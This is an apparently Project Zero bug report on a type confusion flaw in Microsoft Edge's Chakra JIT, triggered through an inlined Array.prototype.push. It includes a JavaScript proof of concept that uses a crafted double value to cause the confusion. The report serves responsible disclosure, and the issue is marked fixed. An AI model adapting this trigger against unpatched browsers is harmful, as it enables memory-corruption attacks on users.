New issue
Advanced search Search tips

Issue 1578 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Aug 16
Cc:



Sign in to add a comment

Microsoft Edge: Chakra: JIT: Type confusion with InlineArrayPush

Project Member Reported by lokihardt@google.com, May 17

Issue description

This is similar to  issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for  issue 1531 .

PoC:
function opt(arr, value) {
	arr.push(value);  // <--------
	arr[0] = 2.3023e-320;
}

function main() {
    for (let i = 0; i < 0x10000; i++) {
		let tmp = [1.1, 2.2, 3.3];
		delete tmp[1];

        opt(tmp, 2.2);
    }

    let arr = [1.1];
    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!

    alert(arr);
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

 
Project Member

Comment 1 by lokihardt@google.com, Aug 16

Status: Fixed (was: New)
Project Member

Comment 2 by lokihardt@google.com, Aug 17

Labels: -Restrict-View-Commit
Project Member

Comment 3 by lokihardt@google.com, Aug 27

Cc: lokihardt@google.com
 Issue 1581  has been merged into this issue.

Sign in to add a comment